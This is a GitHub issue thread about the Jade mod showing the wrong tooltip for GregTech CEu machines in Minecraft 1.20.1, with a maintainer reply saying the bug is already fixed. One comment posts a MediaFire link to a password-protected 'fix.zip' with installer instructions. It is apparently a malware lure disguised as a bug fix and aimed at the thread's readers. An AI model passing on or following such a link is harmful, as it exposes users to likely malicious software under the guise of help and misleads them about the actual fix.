### ISSUE TITLE
Jade does not display the GTM's machine correctly

### ISSUE THREAD

**Issue by terryaxe** [GregTechCEu/GregTechCEu-1.19#1826]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

v1.4.0

### Minecraft Version

1.20.1

### Recipe Viewer Installed

No Recipe Viewer

### Environment

Singleplayer

### Cross-Mod Interaction

Yes

### Other Installed Mods

Jade，version:11.10.1

### Expected Behavior

show machine's tooltip

### Actual Behavior

show the block I looked at before that

### Steps to Reproduce

1:install 1.20.1-Neoforge 47.1.106
2:install the latest jade and gtm
3:open the game,into a save
4:place a machine

### Additional Information

Well,I sent a issue to jade,but they told me report this bug in there
link:https://github.com/Snownee/Jade/issues/459

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by screret** [comment]
Known issue, fixed already.
